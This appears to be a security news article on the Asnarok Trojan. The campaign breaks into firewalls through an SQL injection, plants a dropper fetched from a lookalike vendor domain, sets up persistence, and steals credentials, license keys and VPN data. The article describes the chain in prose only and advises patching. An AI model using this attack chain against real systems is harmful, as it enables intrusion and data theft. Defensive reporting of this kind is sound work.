A very experienced hacking group has been detected to break into networks and firewalls using a malware called the Asnarok Trojan, also known as Asnarök.
This is a very recent coordinated attack marked as highly destructive. A lot of effort has been undertaken into analyzing the Trojan’s capabilities and damage on victim networks.
The Asnarok Trojan Attacks: the Initial Infection
Last week several high-impact attacks were made against network infrastructure and firewalls guarding them of various business owners. The investigation shows that the initial source of infections appears to be caused by an unknown SQL injection bug. The result of a successful exploit is the launching of an attack on the firewall protecting the target network.
This tactic gives out two very important assumptions that are related to the hackers behind the Trojan operation. The first is that the target are probably well-researched by the criminal group — it appears that the hackers have uncovered a dangerous bug which they have learned how to exploit. In order to execute it they will need to check if the system ha all the requirements: a database server running the necessary software version and an attached firewall that can be exploited. All of this can be done either by starting manual scans or using a complicated hacking toolkits loaded with the necessary variables and options. It is also possible that all of this is done by he Asnarok Trojan itself.
The analysis of the Trojan operations shows that the SQL injection is actually a one-line code that is placed in one of the existing databases. This will make the database serer to retrieve a file from a hacker-controlled server which is hosted on a domain name that sounds very safe and legitimate to administrators as it impersonates a firewall vendor. The file is the actual payload dropper which is responsible for the Trojan’s installation and operation. The file is dropped to a temporary folder designed to store files which are not always used by the system, modified to be executable by users and processes and start it.
Asnarok Trojan Unleashed: Impact on the Systems
As soon as the installation script is triggered on the contaminated computers the irst action will be to run a series of SQL commands. They are designed to modify or delete certain values stored in database tables, one of them is the display of the administrative IP address of the contaminated device. According to the researchers this is done in order to hide the presence of the infiltration.
The payload installer script will then launch two other separate scripts which will be downloaded and executed from the same temporary folder. Their actions will be to modify th configuration of the deployed firewalls, boot time services and other running applications. An additional mechanism which is run by the engine is the persistent installation of all malware code. Every time the device is started the scripts be launched. Some of the ordinary running applications and services may be stopped or modified. One of the scripts will establish the Trojan connection which will connect the hijacked machine to a remote server from where a program will be downloaded. This will run a malware firewall that will replace the standard running software.
The consequences of the Trojan actions include data theft which can include database contents and machine system data. The collected information can be used to create an unique ID which is based on the extracted data. The complete Asnarok Trojan analysis appears to hijack the following data: public IP address, firewall license key, SQL user account info, administrator passwords, VPN users and policies. The collected data will be archived file using the tar command and then encrypted using OpenSSL. The resulting file will be sent to the hackers via the Trojan network connection.
Soon after the initial infection has been done the vendor has released a patch to all vulnerable devices. Automatic updates to firewalls should be enabled so that the file is retrieved from the company and applied automatically. For further information, refer to the initial report.